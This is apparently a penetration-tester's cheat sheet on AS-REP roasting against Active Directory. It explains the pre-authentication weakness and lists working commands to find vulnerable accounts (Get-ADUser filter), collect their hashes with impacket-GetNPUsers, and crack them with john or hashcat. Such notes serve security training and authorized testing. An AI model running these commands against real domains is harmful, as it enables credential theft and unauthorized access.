AS-REP Roast

Theory

AS-REP roasting is an attack that is often-overlooked in my opinion it is not extremely common as you have to explicitly set Accounts Does not Require Pre-Authentication aka DONT_REQ_PREAUTH

Pre-Authentication is the first step in Kerberos Authentication and it’s main role is to try prevent against brute-force password guessing attacks.

Typcially during Pre-Auth a user will enter his creds which will be used to encrypt a time stamp and the DC will decrypt it to validate that the correct creds were used. If the DC verifies okay it will issue a TGT however if Pre-Authentication is disabled it would allow an attacker to request a ticket for any user and the DC would simply return a TGT which will be encrypted similar to the Kerberoast attack which can be cracked offline.

AS-REP is cool as you don’t even have to do it from a Domain-Joined Machine or Domain-User you just have to have access to request to the KDC however being on a Domain-Joined Machine or having Domain Creds will make the enumeration process way easier as you can simply use LDAP Filter or PowerView to find targets.

Such as:

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Request AS_REP Message

If you have a credential:

impacket-GetNPUsers '<domain>\<username>:<password>' -dc-ip <dc_ip>

If you don't have a credential:

impacket-GetNPUsers <domain>/ -usersfile usernames.txt -outputfile hash.txt

Note that the / in <domain_name>/ is required, otherwise GetNPUsers won't recongize that string as a domain

TGT Cracking

Crack the TGT ticket with John:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast

Or with hashcat:

hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt

Reference

How To Attack Kerberos 101m0chan Blog - Info Sec, CTF & Hacking

How To Attack Kerberos 101 - m0chan